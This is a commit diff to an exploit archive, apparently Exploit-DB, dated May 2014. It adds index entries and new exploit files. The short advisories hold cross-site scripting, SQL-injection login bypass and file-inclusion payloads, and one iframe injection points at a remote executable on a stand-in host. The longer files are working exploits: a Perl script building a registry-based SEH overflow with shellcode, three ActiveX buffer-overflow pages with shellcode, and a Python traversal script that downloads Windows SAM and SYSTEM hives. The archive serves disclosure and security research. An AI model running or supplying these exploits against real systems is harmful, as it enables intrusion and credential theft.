Updated 05_21_2014

files.csv

@@ -30107,3 +30107,19 @@ id,file,description,date,author,platform,type,port
 33418,platforms/php/webapps/33418.txt,"Joomla! 'com_joomportfolio' Component 'secid' Parameter SQL Injection Vulnerability",2009-12-17,"Fl0riX and Snakespc",php,webapps,0
 33419,platforms/php/webapps/33419.txt,"F3Site 2009 mod/poll.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0
 33420,platforms/php/webapps/33420.txt,"F3Site 2009 mod/new.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0
+33421,platforms/php/webapps/33421.txt,"Ampache 3.4.3 'login.php' Multiple SQL Injection Vulnerabilities",2009-12-18,R3d-D3V!L,php,webapps,0
+33422,platforms/php/webapps/33422.txt,"JBC Explorer 7.20 'arbre.php' Cross Site Scripting Vulnerability",2009-12-20,Metropolis,php,webapps,0
+33423,platforms/hardware/remote/33423.txt,"Barracuda Web Application Firewall 660 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities",2009-12-19,Global-Evolution,hardware,remote,0
+33424,platforms/php/webapps/33424.txt,"Kasseler CMS 1.3.4 Lite Multiple Cross Site Scripting Vulnerabilities",2009-12-21,Gamoscu,php,webapps,0
+33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow",2014-05-19,"Mike Czumak",windows,local,0
+33428,platforms/windows/webapps/33428.py,"SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.0.4 Directory Traversal",2014-05-19,"Matt Schmidt",windows,webapps,7002
+33431,platforms/windows/remote/33431.html,"AoA Audio Extractor Basic 2.3.7 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
+33432,platforms/windows/remote/33432.html,"AoA DVD Creator 2.6.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
+33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
+33434,platforms/windows/webapps/33434.rb,"HP Release Control Authenticated XXE",2014-05-19,"Brandon Perry",windows,webapps,80
+33435,platforms/php/webapps/33435.txt,"ClarkConnect Linux 5.0 'proxy.php' Cross Site Scripting Vulnerability",2009-12-22,"Edgard Chammas",php,webapps,0
+33436,platforms/php/webapps/33436.txt,"PHP-Calendar 1.1 update08.php configfile Parameter Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",php,webapps,0
+33437,platforms/php/webapps/33437.txt,"PHP-Calendar 1.1 update10.php configfile Parameter Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",php,webapps,0
+33438,platforms/multiple/webapps/33438.txt,"webMathematica 3 'MSP' Script Cross Site Scripting Vulnerability",2009-12-23,"Floyd Fuh",multiple,webapps,0
+33439,platforms/php/webapps/33439.txt,"MyBB 1.4.10 'myps.php' Cross Site Scripting Vulnerability",2009-12-24,"Steven Abbagnaro",php,webapps,0
+33440,platforms/php/webapps/33440.txt,"Joomla! iF Portfolio Nexus 'controller' Parameter Remote File Include Vulnerability",2009-12-29,F10riX,php,webapps,0

platforms/hardware/remote/33423.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37432/info
+
+The Barracuda Web Application Firewall 660 is prone to multiple HTML-injection vulnerabilities.
+
+Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
+
+The Barracuda Web Application Firewall 660 firmware 7.3.1.007 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US

platforms/multiple/webapps/33438.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/37451/info
+
+webMathematica is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/webMathematica/MSP\<script>alert('a')</script> 

platforms/php/webapps/33421.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/37417/info
+
+Ampache is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Ampache 3.4.3 is vulnerable; other versions may also be affected.
+
+The following data is available:
+
+username : x' or ' 1=1
+password : x' or ' 1=1 

platforms/php/webapps/33422.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37423/info
+
+JBC Explorer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+JBC Explorer 7.20 is vulnerable; other versions may also be affected.
+
+http://www.example.com/album/dirsys/arbre.php?0=search&last=1<body+onload=alert(document.cookie)> 

platforms/php/webapps/33424.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/37435/info
+
+Kasseler CMS is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
+
+Kasseler CMS 1.3.4 Lite is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?module=[target]&do=View&id="><script>alert();</script>
+ 
+http://www.example.com/index.php?module=[target]&do="><script>alert();</script>
+ 
+http://www.example.com/index.php?module=Account&do=UserInfo&uname="><script>alert();</script>

platforms/php/webapps/33435.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37446/info
+
+ClarkConnect Linux is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+ClarkConnect Linux 5.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com:82/public/proxy.php?url=<script>alert("XSS")</script>

platforms/php/webapps/33436.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37450/info
+
+PHP-Calendar is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
+
+PHP-Calendar 1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/php-calendar-1.1/update08.php?configfile=//servername/path/to/file.php
+http://www.example.com/php-calendar-1.1/update08.php?configfile=ftp://guest:pass@site/path/to/file.php 
+http://www.example.com/php-calendar-1.1/update08.php?configfile=/etc/passwd 

platforms/php/webapps/33437.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37450/info
+ 
+PHP-Calendar is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
+ 
+PHP-Calendar 1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/php-calendar-1.1/update10.php?configfile=\\ip\path\to\file.php
+http://www.example.com/php-calendar-1.1/update10.php?configfile=ftp://site/path/to/file.php
+http://www.example.com/php-calendar-1.1/update10.php?configfile=/etc/passwd 

platforms/php/webapps/33439.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37464/info
+
+MyBB is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+MyBB 1.4.10 is vulnerable; other versions may be affected as well.
+
+http://www.example.com/myps.php?action=donate&username="/>
+
+http://www.example.com/myps.php?action=donate&username=<IMG""">"> 

platforms/php/webapps/33440.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37473/info
+
+The iF Portfolio Nexus ('com_if_nexus') component for Joomla! is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. 
+
+The following example URI is available:
+
+http://www.example.com/[Yol]/index.php?option=com_kif_nexus&controller=[-LFI-]
+
+

platforms/windows/local/33426.pl

@@ -0,0 +1,89 @@
+#!/usr/bin/perl
+
+######################################################################################################
+# Exploit Title: CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow
+# Discovery date: 11-26-2013
+# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
+# Vulnerable Software/Version: CyberLink Power2Go 9 Essential 9.0.1002.0
+# Vendor Site: http://www.cyberlink.com/
+# Tested On: Windows XP SP3
+# Timeline:
+# -- 11/28/13: Initial contact to vendor requesting appropriate POC to provide vuln details  
+# -- 12/03/13: Received appropriate submission POC, initial vuln details provided to vendor
+# -- 12/11/13: Vendor response indicating issue has been escalated to Development team
+# -- 12/17/13: Vendor response indicating RD team working on fix
+# -- 03/05/14: Requested status from vendor who indicated issue has been re-escalated to Development
+# -- 03/07/13: Vendor response indicating someone from Development would contact for more details
+# -- 03/07/14: Vendor response indicating product team working on fix, new release scheduled 3/28
+# -- 03/16/14: Additional details provided to vendor as requested
+# -- 04/06/14: Status update requested from vendor
+# -- 04/08/14: New build released, provided for testing; confirmed fix for this issue
+# Details:
+# -- Power2Go uses registry keys to set various attributes including the registered username
+# -- The registered username is loaded into memory for display when the "About" screen is opened
+# -- These registry values can be found here: HKEY_LOCAL_MACHINE\SOFTWARE\CyberLink\Power2Go9\9.0
+# -- It loads these values into memory without proper bounds checks which enables the exploit
+# To Exploit:
+# -- 1) Run created .reg file 2) Open Power2Go 3) Click on Power2Go Logo in the upper left corner 
+# -- Once the registry has been modified, this exploit will be persistent and execute every time
+# -- the application is run and the "About" screen is opened 
+######################################################################################################
+
+my $buffsize = 50000; # sets buffer size for consistent sized payload
+
+# construct the required start and end of the reg file
+my $regfilestart ="Windows Registry Editor Version 5.00\n\n";
+$regfilestart = $regfilestart . "[HKEY_LOCAL_MACHINE\\SOFTWARE\\CyberLink\\Power2Go9\\9.0]\n";
+$regfilestart = $regfilestart . "\"UserName\"="; # The UserName field is vulnerable
+
+my $junk = "T_v3rn1x" . ("\x41" x 4892); # offset to next seh 
+my $nseh = "\x61\x62"; # overwrite next seh with popad + nop
+my $seh = "\xd0\x50"; # overwrite seh with unicode friendly pop pop ret
+
+# unicode venetian alignment
+my $venalign = "\x6e";
+$venalign = $venalign . "\x53"; # push ebx; ebx is the register closest to our shellcode following the popad 
+$venalign = $venalign . "\x6e"; # venetian pad/align
+$venalign = $venalign . "\x58"; # pop eax; put ebx into eax and modify to jump to our shellcode (200 bytes)
+$venalign = $venalign . "\x6e"; # venetian pad/align
+$venalign = $venalign . "\x05\x14\x11"; # add eax,0x11001400
+$venalign = $venalign . "\x6e"; # venetian pad/align 
+$venalign = $venalign . "\x2d\x12\x11"; # sub eax,0x11001200
+$venalign = $venalign . "\x6e"; # venetian pad/align
+$venalign = $venalign . "\x50"; # push eax
+$venalign = $venalign . "\x6e"; # venetian pad/align
+$venalign = $venalign . "\xc3"; # ret
+
+my $nops = "\x71" x 236; # some unicode friendly filler before the shellcode
+
+# Calc.exe payload
+# msfpayload windows/exec CMD=calc.exe R
+# alpha2 unicode/uppercase
+my $shell = "PPYAIAIAIAIAQATAXAZAPA3QADAZA".
+"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA".
+"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB".
+"AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K".
+"22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL".
+"MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55".
+"Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V".
+"NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB".
+"R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT".
+"NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU".
+"89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM".
+"KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC".
+"QQ2LRCM0LJA";
+
+my $sploit = $junk.$nseh.$seh.$venalign.$nops.$shell; # assemble the exploit portion of the buffer
+my $fill = "\x71" x ($buffsize - length($sploit)); # fill remainder of buffer with junk
+my $buffer = $sploit.$fill; # assemble the final buffer
+
+my $regfile = $regfilestart . "hex: " . $buffer . $regfileend; # construct the reg file with hex payload to generate binary registry entry
+my $regfile = $regfilestart . "\"". $buffer . "\"";
+
+# write the exploit buffer to file
+my $file = "cyberlinkp2g9_bof.reg";
+open(FILE, ">$file");
+print FILE $regfile;
+close(FILE);
+print "Exploit file [" . $file . "] created\n";
+print "Buffer size: " . length($buffer) . "\n"; 

platforms/windows/remote/33431.html

@@ -0,0 +1,55 @@
+<!--
+# Exploit Title: AoA Audio Extractor Basic ActiveX
+# Date: 19.05.2014
+# Author: metacom
+# Website: www.rstforums.com
+# Software Link: www.aoamedia.com/audioextractor.exe
+# Version: 2.3.7
+# Tested on: Windows xp sp3EN  IE 6.0
+-->
+<html>
+<object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' /></object>
+<script language='javascript'>
+nse="\xEB\x06\xff\xff";
+seh="\x58\xE4\x04\x10";
+nops="\x90";
+while (nops.length<10){ nops+="\x90";}
+shellcode =(
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+
+"\x4e\x46\x43\x36\x42\x50\x5a");
+buffer1="\x41";
+buffer2="\x42";
+while (buffer1.length<2048){ buffer1+=buffer1;}
+buffer1=buffer1.substring(0,2048);
+buffer2=buffer1;
+while (buffer2.length<2048){ buffer2+=buffer2;}
+arg1=buffer1+nse+seh+nops+shellcode+buffer2;
+arg2="\x52\x53\x54";
+arg3="\x52\x53\x54";
+arg4="\x52\x53\x54";
+arg5="\x52\x53\x54";
+target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );
+ 
+
+</script>
+</html>

platforms/windows/remote/33432.html

@@ -0,0 +1,56 @@
+<!--
+# Exploit Title: AoA DVD Creator ActiveX
+# Date: 19.05.2014
+# Author: metacom
+# Website: www.rstforums.com
+# Software Link: www.aoamedia.com/aoadvdcreator.exe
+# Version: 2.6.2
+# Tested on: Windows xp sp3EN  IE 6.0
+-->
+
+<html>
+
+<object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target'></object>
+<script language='javascript'>
+nseh="\xEB\x06\x90\x90";
+seh="\x1f\x5c\x03\x10";
+nops="\x90";
+while (nops.length<10){ nops+="\x90";}
+shellcode =(
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+
+"\x4e\x46\x43\x36\x42\x50\x5a");
+buff="\x41";
+buff2="\x42";
+while (buff.length<2032){ buff+=buff;}
+buff=buff.substring(0,2032);
+buff2=buff;
+while (buff2.length<2048){ buff2+=buff2;}
+arg1="defaultV";
+arg2="defaultV";
+arg3=buff+nseh+seh+nops+shellcode+buff2;
+arg4="defaultV";
+arg5="defaultV";
+
+target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );
+
+</script>

platforms/windows/remote/33433.html

@@ -0,0 +1,54 @@
+<!--
+# Exploit Title: AoA MP4 Converter ActiveX
+# Date: 19.05.2014
+# Author:metacom 
+# Website: www.rstforums.com
+# Software Link: www.aoamedia.com/AoAMP4Converter.exe
+# Version: 4.1.2
+# Tested on: Windows xp sp3EN  IE 6.0
+-->
+<html>
+<object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' /></object>
+<script language='javascript'>
+nse="\xEB\x06\x90\x90";
+seh="\x70\x6b\x04\x10";
+nops="\x90";
+while (nops.length<10){ nops+="\x90";}
+shellcode =(
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+
+"\x4e\x46\x43\x36\x42\x50\x5a");
+junk1="\x41";
+junk2="\x42";
+while (junk1.length<2048){ junk1+=junk1;}
+junk1=junk1.substring(0,2048);
+junk2=junk1;
+while (junk2.length<4048){ junk2+=junk2;}
+arg1=junk1+nse+seh+nops+shellcode+junk2;
+arg2="RST";
+arg3="RST";
+arg4="RST";
+arg5="RST";
+target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );
+ 
+ 
+</script>

platforms/windows/webapps/33428.py

@@ -0,0 +1,63 @@
+#!/usr/bin/python
+#
+# Exploit Title: SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.0.4 Directory Traversal 
+# Date: 04/28/2014
+# Exploit Author: Matt Schmidt (Syph0n)
+# Vendor Homepage: http://www.safenet-inc.com/
+# Software Link: http://c3.safenet-inc.com/downloads/2/1/21DAC8BE-72DE-4D32-85D4-6A1FC600581E/Sentinel%20Protection%20Installer%207.4.0.exe
+# Version: SafeNet Sentinel Protection Server 7.0.0 through 7.4.0 and Sentinel Keys Server 1.0.3
+# Tested on: Windows 7 and Windows XP SP2
+# CVE: CVE-2007-6483
+# Dork: intitle:"Sentinel Keys License Monitor"
+# Greets to norsec0de
+
+import sys, urllib2, argparse
+
+print '\n[+] SafeNet Sentinel Protection Server 7.0 - 7.4 Directory Traversal Exploit'
+print '[+] Written by Matt Schmidt (Syph0n)'
+print '[+] This script will download the registry hives, boot.ini and win.ini off the Target Windows box'
+print '[+] For Windows versions other than Windows XP you will have to append the --file option and specifiy a file\n'
+
+
+# Define Help Menu
+if (len(sys.argv) < 2) or (sys.argv[1] == '-h') or (sys.argv[1] == '--help'):
+    print 'Usage:'
+    print './exploit.py --host <target> [options]'
+    print '    <host>: The victim host\n'
+    print '  Options:'
+    print '    --port      The port the application is listening on (default: 7002)'
+    print '    --file      Path to the desired remote file (ex. windows/repair/sam) without starting slash\n\n'
+    sys.exit(1)
+
+# Parse Arguments
+parser = argparse.ArgumentParser()
+parser.add_argument('--host', required = True)
+parser.add_argument('--port', type = int, default = 7002)
+parser.add_argument('--file')
+args = parser.parse_args()
+
+# Define Variables
+host = args.host
+port = args.port
+if args.file is not None :
+	targetFile = [args.file]
+else:
+	targetFile = ['windows/repair/default', 'windows/repair/sam', 'windows/repair/system', 'windows/repair/software', 'windows/repair/security', 'boot.ini', 'windows/win.ini']
+
+# Send Exploit
+print '[+] Sending exploit!'
+
+# Loop for multiple files
+for path in targetFile:
+	# Define Directory Traversal path
+	url = "http://" + host + ":" + str(port) + "/../../../../../../../../../../../../../../" + str(path)
+		
+	# Retrieve file(s)
+	exploit = urllib2.urlopen(url)
+	header = exploit.info()
+	size = int(header.getheaders("Content-Length")[0])
+	print "\n[+] Downloading: C:\%s ! Bytes: %s" % (path, size)
+	filename = url.rsplit('/',1)
+	with open(str(filename[1]), "wb") as contents:
+		contents.write(exploit.read())
+print '\n[+] Done!\n'